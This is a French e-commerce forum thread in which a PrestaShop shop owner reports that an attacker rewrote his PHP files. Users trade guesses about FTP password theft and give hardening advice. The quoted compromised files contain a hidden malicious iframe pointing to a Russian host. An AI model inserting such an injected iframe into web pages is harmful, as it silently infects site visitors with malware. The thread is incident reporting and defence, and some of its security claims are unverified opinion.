Mon site a été PIRATE ! (tous les index.php réécrits)

[l'indien]

Bonjour à tous,
hier soir à 21h056 un petit rigolo qui doit bien connaitre Prestashop a réussi a... rentrer... et réécrire TOUS mes fichiers index.php de chacun des répertoires de prestashop.. et ... homefeatured.php du module du même nom, bizarre bizarre...
le fichier main.php dans le répertoire phpmyadmin est touché aussi (même ajout en fin de fichier).


exemple index.php à la racine :

le normal :

<?php

include(dirname(__FILE__).'/config/config.inc.php');
include(dirname(__FILE__).'/header.php');

$smarty->assign('HOOK_HOME', Module::hookExec('home'));
$smarty->display(_PS_THEME_DIR_.'index.tpl');

include(dirname(__FILE__).'/footer.php');

?>

le piraté :

<?php

include(dirname(__FILE__).'/config/config.inc.php');
include(dirname(__FILE__).'/header.php');

$smarty->assign('HOOK_HOME', Module::hookExec('home'));
$smarty->display(_PS_THEME_DIR_.'index.tpl');

include(dirname(__FILE__).'/footer.ph
<iframe src="http://xb8.ru:8080/ts/in.cgi?pepsi122" width=125 height=125 style="visibility: hidden"></iframe>

idem pour la fin de homefeatured.php :
le normal :

'category' => $category,
'products' => $products,
'currency' => new Currency(intval($params['cart']->id_currency)),
'lang' => Language::getIsoById(intval($params['cookie']->id_lang)),
'productNumber' => sizeof($products)
));
return $this->display(__FILE__, 'homefeatured.tpl');
}

}

le piraté :

           'category' => $category,
           'products' => $products,
           'desc' => $DESC,
           'currency' => new Currency(intval($params['cart']->id_currency)),
           'lang' => Language::getIsoById(intval($params['cookie']->id_lang)),
           'productNumber' => sizeof($
<iframe src="http://xb8.ru:8080/ts/in.cgi?pepsi122" width=125 height=125 style="visibility: hidden"></iframe>

Au matin je regarde mes commandes de la nuit est tombe sur : voir capture d'écran.

Si quelqu'un à un tuyau pour éviter ce genre de désagrément ? ou qui a déjà subi cela ? merci de m'aider !!!

Par ailleur y a t il un trou de sécurité qq part ? si oui ou ?



AU FAIT, J'AI OUBLIE DE DIRE QUE J'AI DEUX SITE PRESTASHOP ET QUE LES DEUX ONT SUBI LE MEME SORT !!!

[minirj01]

Bonjour,
Topic similaire ici:
http://www.prestashop.com/forums/viewthread/23399/installation_configuration_et_mise_a_jour/site_hacke
Bon courage.

[jolvil]

Est ce que tu utilises FileZilla, il y aurai une faille de sécurité, comment as tu réussi à réparer le probleme?

[Fluorite]

Salut

moi je doute que ce soit Filezilla ,car s’ils avaient vraiment une faille de sécurité sa ferais longtemps quel serais corrigé... puis il suffit de faire des recherches sur google.

Ou il y'a eu vole de MDP ... mais je trouve que ça arrive trop fréquemment en ce moment bizarre,ou il y aurait une faille dans prestashop pour l'instant inconnu.

le mieux et de savoir par ou et entrer le Pirate en regardant de prés les logs

Bye
Yannick

[Cédric Girard]

Bonjour

Je pense pour ma part qu'il s'agit d'un problème de sécurité au niveau mot de passe. Si les deux sites touchés sont hébergés au même endroit, il me semble évident qu'ils sont tous les deux affectés.

Je connais BEAUCOUP de clients qui ont des password FTP dérisoires au niveau sécurité ; utilisez des pass d'AU MOINS 10-12 caractères, avec majuscules/minuscules, chiffres et caractères spéciaux.

Ne nommez pas votre répertoire admin "admin"

Et surtout, faites des sauvegardes complètes de vos boutiques "au cas où" !

[minirj01]

Bonjour,
Le problème c'est que (notamment sur OVH) les mots de passe FTP doivent être composés de 6 à 8 caractères alpha-numériques maximum.

[l'indien]

ok
je viens de finir de rétablir le site.
Il a fallut que je controle sous ftp toutes les dates de modifications (au 2 aout à 21h54~)
j'ai constaté que seuls tous les fichiers index.php, le main.php du répertoire phpmyadmin et... curieusement (je le répète) homefeatured.php étaient modifiés.

donc j'ai retéléchargés les fichiers réécrits par ftp.

il me reste a faire le second site.

pour ma part, je ne crois pas a la thèse du mot de passe cassé !

[l'indien]

peux tu me dire ou sont les logs BOBY LA FLECHE ?
sur le serveur de mon hébergeur ou cela existe sur prestashop ?

[Peha]

Bonjour à tous,
à vous lire, on dirait que vous préféreriez que ce soit une faille presta.

On en parle sur le forum OVH > http://forum.ovh.com/showthread.php?t=49433
Joomla > http://forum.joomla.fr/showthread.php?t=94740
et sûrement sur bien d'autres forums...

mais bon c'est plus facile de mettre la team en cause que d'envisager qu'on ait pu se laisser contaminer.
Des MacUsers ont ils eu ce problème ?

[édit] je me rend compte que mon message est un peu polémique, dsl, bon courage pour la résolution de vos problèmes.

pa.

[incredible india !]

non PEHA il n'y a pas de polémique, seulement des personnes qui ont eu le même problème et qui cherchent une solution !
a part cela aucune polèmique n'est soulevée et nous ne remercierons jamais assez la team de Prestashop qui fait un travail admirable !!!

donc trou ou pas trou ? sur prestashop ou firefox ? si non alors il faut que je renforce mes mots de passe ...

Un thé PEHA ?

[Fluorite]

Re

peux tu me dire ou sont les logs BOBY LA FLECHE ?
sur le serveur de mon hébergeur ou cela existe sur prestashop ?

Bien sûr il faut voir avec votre hébergement pour voir si vous avez des logs quelque part surement avec OSL ou Urchin ou Awstats-ols ou peut-être dans votre répertoire sur le FTP ...voyez donc avec votre Hébergeur.
voila bye
yannick

[sofred]

Bonjour, l'indien
J'ai déja répondu plusieurs fois à ce genre de pbs.
http://www.prestashop.com/forums/viewthread/23399/
http://www.prestashop.com/forums/viewthread/24166/

1) Prestashop v1.1 n'a pas de "trou" et est fiable. Je l'ai testé et approuvé...
2) La question sur FileZilla est trés pertinente... Car oui il y a des failles
3)Quel est ton hebergeur ?
4) A mon avis tu fais piqué tes pass FTP via ton logiciel FTP (classique en ce moment)

Pour répondre à Peha (dont je salue le super travail qu'il fait), les Macusers n'ont pas ce type de problèmes :-))

Bon courage

[Fabrice]

c'est peut-être le moment de passer sur Mac ?

héhé !
un macuser intégriste :vampire:

pouvez pas comprendre... :-)mais je me comprends et ça suffit.

[sofred]

C'est une excellente résolution.
Perso j'ai le mac en prod et le PC juste pour voir les compatibilités navigateur...

[Fabrice]

sofred : tu ne connais pas ceci ? mais je pense que si...

bon il est vrai qu'avec un vrai pc, c'est plus rapide. perso j'utilise Parallels.

[sofred]

Si je connais mais à chaque fois que je veux l'utiliser le site est busy :-((
Alors j'ai quand même installer parallels sur mon macbook ;-)
Tu utilises quel ftp ?

[Seo Organique]

open bsd free bsd pendant qu'on y est!! une bonne strategie de backup en amont suffit....le troll mac bof.

[Fabrice]

Si je connais mais à chaque fois que je veux l'utiliser le site est busy :-((
Alors j'ai quand même installer parallels sur mon macbook ;-)
Tu utilises quel ftp ?

@ sofred : j'utilise Yummy FTP - qui est très stable et plutôt rapide :-)

@ aline, pourquoi parler de troll à chaque fois que l'on évoque le mac ?
ça fout tant les boules que ça d'être sur pécé ?

[Seo Organique]

bien possible...:-) mais si honereux à l'achat:-(

[Fabrice]

:-) ah ! tu as de l'humour... j'aime ça !!

bises et bonne soirée !

ps : pas si cher que ça un mac... t'as les nouveaux macbook pros. géniaux. et sur l'applestore, tu as une rubrique "mac reconditionnés" - j'en ai déjà acheté 2 par ce biais. et les macs arrivent comme neufs - bon j'arrête la pub gratuite.

[sofred]

Mac forever !!!
:cheese:

[Seo Organique]

et sofred qui confirme! ahlala help me!

[sofred]

Les macusers sont solidaires ! Quand tu changeras ton OVH 90, tu commandes un Mac en même temps... :snake:
Bizzz

[Fabrice]

tiens aline ! :kiss: :kiss: :kiss:

en attendant de passer aux choses sérieuses... (je parle du mac, hein ?)

[Ann]

Arf, juste pour fiche ma zone, Mac rules ! :vampire:

[Maxime.]

Je me pose une question au sujet du fichier config.inc

Le pirate n'a aucun moyen de voir le contenu ? (le mot de passe de la BDD etant inscrit en clair)

[Atch]

Si je connais mais à chaque fois que je veux l'utiliser le site est busy :-((
Alors j'ai quand même installer parallels sur mon macbook ;-)
Tu utilises quel ftp ?

Sinon il y a IEtester avec debugbar inclu dedans....

Ha c'est peut etre pas compatible avec Mac... LOL

Ok je -->

V++

Atch

[Fabrice]

Ha c'est peut etre pas compatible avec Mac... LOL

Ok je -->

V++

Atch

vi. ça vaut mieux. ;-)

[Fabrice]

ce sujet est tout sauf un bug. déplacé.

[junnecito]

l'indien:
J'au le meme probleme avec 1 de me boutique, avec le me code.
J'espere arriver a que ca n'arrive plus, ce un travaille corriger tout.

[Fabrice]

backups !! tous les jours.
perso j'utilise NAVICAT qui est d'une facilité déconcertante pour les backups. et il na fait pas que ça : c'est un investissement très vite rentabilisé.

existe même pour pc... c'est dire. :-)

[Alekhine]

C'est quoi un "MAC" ??


(en fait je suis déjà sorti :x )

[l'indien]

REATTAQUE CE JOUR 15h15

idem même consèquences (les index.php réécrits).
appel immédiat à mon hébergeur qui a bloqué tous les accés ftp car il m'a confirmé que pendant que je retélécharger mes bons index.php le gugus (son script) continué le carnage.
mon hébergeur m'a confimé qu'il utilisé plusieurs adresse ip.

ALORS ATTENTION !!! si cela vous arrive, il faut recharger tous vos fichiers index.php, main.php (dans phpmyadmin),
homefeatured.php (curieusement le .tpl alors que le code n'est pas dans le template ???).
de plus je me suis aperçu qu'il faut également recharger certains .tpl du répertoire \themes\prestashop\ ???
Il faut également recharger certains modules (BLOCKVARIOUSLINK (JOLVI voila pourquoi je n'avais plus ton lien en footer !!) et autres modules...

mes postes ont été scannés (NOD32) rien !
je viens de télécharger Zonealarm et je scanne actuellement afin de rechercher des chevaux de troie et autres amuse gueule ...

Tous les accés ftp ont été changés et les mdp changés en plus complexe...
suite au prochain numéro...

PS: je reçois sans problème mes règlements sur paypal et par carte VISA (module ATOS), je déplore "seulement" une interuption de service du site pendant 1 heure... mais le problème c'est qu'il vous surveiller le site tt le temps ...

[Peha]

@l'indien
ne pas enregistrer les nouveaux identifiants dans le logiciel ftp que tu utilises (et juste les avoir dans un carnet) peut (peut être) l'empêcher de récupérer à nouveau le code...

[l'indien]

bonne idée Peha ! il vaut mieux perdre 10 secondes à saisir que 1 heure à recharger les index !

[vic]

Vous n'avez pas un accès sécurisé genre SSH sur vos boites ? FTP c'est franchement pas le top en matière de sécurité. Au moins, surtout ne jamais sauvegarder ses mots de passe ! C'est le niveau zéro de la sécurité ... Une fois que l'attaquant a pu rentrer dans le système il faut tout vérifier et s'assurer qu'il n'a pas planté un script qui lui permettrait de re-rentrer ultérieurement même sans mots de passe ... Et en l'occurrence l'OS n'a rien à voir dans l'affaire donc les amateurs de Macintosh ferait bien de ne pas faire preuve d'une confiance excessive.

[sofred]

@vic
Et en l’occurrence l’OS n’a rien à voir dans l’affaire donc les amateurs de Macintosh ferait bien de ne pas faire preuve d’une confiance excessive.

Evidemment que oui ! Un Pc est beaucoup plus vulnérable qu'un PC et tente de me prouver le contraire. Ok un mac n'est pas infaillible mais il est plus facile et moins coûteux de le protéger.
On se tue à répêter les mêmes consignes.... Il est évident que dans le cas présent c'est le ftp qui est mis en cause : Filezilla ?

[Peha]

Bonjour

Et en l’occurrence l’OS n’a rien à voir dans l’affaire

d'après ce que j'ai trouvé sur le sujet, il s'agirait d'un trojan pour Window qui récupère les mdp enregistrés dans les clients ftp (filezilla...etc).
(d'ailleurs ils suffit de faire le test avec AVAST installé d'aller sur un site infecté pour choper une alerte)

Ensuite ces mdp sont envoyés a des scripts qui se connectent au ftp visé et modifient certains fichiers automatiquement (en priorité les fichiers index mais pas seulement) pour y rajouter une iFrame qui va diffuser le trojan pour infecter d'autres utilisateurs de Window etc.

pas un seul macUser concerné par l'affaire, mais bien sur Window n'a rien à voir avec la faille de sécurité et c'est la faute
_1 de Presashop qui a des failles
_2 du protocole ftp qui n'est pas sécurisé

:snake:

SSH n'a pas la même utilité, et n'est pas plus sécurisé que le ftp si on se fait voler son mdp...
au contraire, si le ssh est actif et que quelqu'un arrive à craquer(ou à vous subtiliser) votre mdp il aura encore plus de liberté sur votre serveur.

pa.

[sofred]

Oui Peha... Ce n'est pas forcément le débat et celui-ci sera toujours éternel... Microsoft vient de relancer la sauce ! De toutes les façons je bosse avec les 2 plateformes en continu sauf que ma machine de prod est un mac.
Pour le hack (on appelle cela comme on veut !) je suis un ancien de la partie aujourd'hui reconverti... C comme ça
La seule chose que je sais et que j'affirme c'est que prestashop est fiable (pour la version 1.1). Nous l'avons passé à la moulinette à plusieurs et rien de grave ou de perturbant à signaler ! Pas plus que e-commerce et moins que magento (oupsss). On va tester la v1.2 (manque de temps en ce moment)
Mais le pb récurent des pbs énnoncés sur le forum viennent souvent du ftp, d'un hebergement sur un OVH 90 plan, et d'un Window (désolé)...
Donc la faille prestashop il va vraiment falloir me la démontrer. En revanche il ne faut négliger les performances de l'hébergement. Faire du e-commerce sur un mutualisé a quand même un moment donné ses limites...

Oui alors l'idée du SSH de vic alors que l'on a des failles avec son ftp est vraiment %&/% (je préfère me taire)...

Bonne continuation à tous !!!

[Alekhine]

Hello,

En lisant ça on pourrait croire que le system MAC est plus sécurisé ^^
En fait il est seulement moins attaqué... [pour le moment]

[sofred]

De la grande philosophie ça...
Tu sors ? Merci...

[Alekhine]

lol, non non je ne sors pas
C'est un peu comme si on disait que statistiquement les Renault tombent en panne plus souvent que les LADA, sans ramener les stats au nombre d'utilisateurs....

(euhh je vais peut-être sortir là finalement lol)

[Fluorite]

Bonjour

je pense que ce post et en train de partir en TROLL excuser du peu,mais lorsque je lie des choses comme.

La seule chose que je sais et que j’affirme c’est que prestashop est fiable (pour la version 1.1). Nous l’avons passé à la moulinette à plusieurs et rien de grave ou de perturbant à signaler !

C’est quoi votre Moulinette? :smirk: À vous entendre parlez-vous ête fiable à 100% ? Hum ! ce que je veux dire, ce n'ai pas parque vous avez rien trouver que forcement il n'y a rien!!! peut-être ne savez pas chercher ? le faite et de dire que le 100% fiable n'existe pas, et ce vanter d'une chose 100% fiable,mais laissez donc moi rire.

Bref

moi sur Google je tombe sur ça . fake ou pas fake.
PrestaShop version 1.1.0.3 suffers from a cross site scripting vulnerability.
http://www.secuobs.com/revue/news/42015.shtml

Je pense que ce n'ai pas a prendre a la légère que ce soit du vol de MDP ou de failles, etc.,etc. ce faire hacker un site et la pire des choses pour un Webmaster dire que t'elle chose et fiable à 100% ça me fait marré aussi.

Je n'insinue en aucun cas que t'elle CMS ou OS et plus fiable que l'autre, juste je le répète le 100% fiable n'existe pas.


bonne journée
Yannick

[sofred]

Pas le souvenir d'avoir dit que j'étais fiable à 100 %, j'ai rien à prouver ici... Ça devient juste un peu énervant qu'un post dérive parce que Professeur Métaphore débarque sur un sujet pour ne rien y apporter.
Voilà pourquoi je réponds de plus en plus aux membres par MP... Au moins je ne perds pas de temps à me justifier...

Mais bon la prochaine fois je posterais mon CV... sans fautes d'orthographes...

[Sam59]

Mais bon la prochaine fois je posterais mon CV... sans fautes d'orthographes...

Euh... je posterai non ?

;-P

[sofred]

Ha oui je confirme "je posterai...". L'air un peu idiot là... :cheese:

[Sam59]

Ca c'est le problème des MAC, parfois les claviers font des petites erreurs %-P

[Alekhine]

Ça devient juste un peu énervant qu'un post dérive parce que Professeur Métaphore débarque sur un sujet pour ne rien y apporter.

lol, ce qui ne te plait pas c'est qu'on te contredise, c'est tout

Toutes les minorités n'ont de cesse de promouvoir ce qui font d'eux une exception, c'est bien connu

[l'indien]

Amis du mac bonjour !

je pense que je suis dans le bon post... enfin j'essai qq même..
pour revenir a mon... heu ... notre problème, voici ce que donne un scanne de ZONEALARM sur mon poste (cf image jointe).

A+

[vic]

Sofred, utiliser SSH (sftp) ne te paraît pas plus fiable qu'utiliser un protocole ou tout, y compris les mots de passe vole en clair sur le réseau ? Bien sur si vous vous faites piquer votre mot de passe le problème est le même mais j'ai dit aussi que sauvegarder ses mots de passe sur son PC était une ineptie en terme de sécurité.

Ensuite baser sa stratégie de sécurité sur le choix d'un OS peu courrant en espérant que les hackers ne s'y intéressent pas est idiot. La preuve est qu'Apple publie des patchs régulièrement, il y a donc des failles. Tu as eu la chance de passer entre les mailles du filet jusqu'à aujourd'hui. Que tu sois sous Windows, Mac OS ou linux, ton client FTP sauvegardera toujours ses mots de passe en clair. Donc, non, ça n'a rien à voir avec l'OS. La vague d'attaque actuelle est due à un ver Windows, mais ça n'empêche pas d'autres attaques d'avoir lieu sur d'autres OS ! Il ne faut pas non plus oublier que si les noyaux des OS sont globalement surs, la multitude de programmes qu'on fait tourner dessus le sont en général beaucoup moins et sont la cible privilégiée des hackers.

P.S. : je n'ai jamais dit que prestashop était buggé.

[bijububu]

C'est quoi un "MAC" ??


(en fait je suis déjà sorti :x )

is a Scottish ( est un Écossais )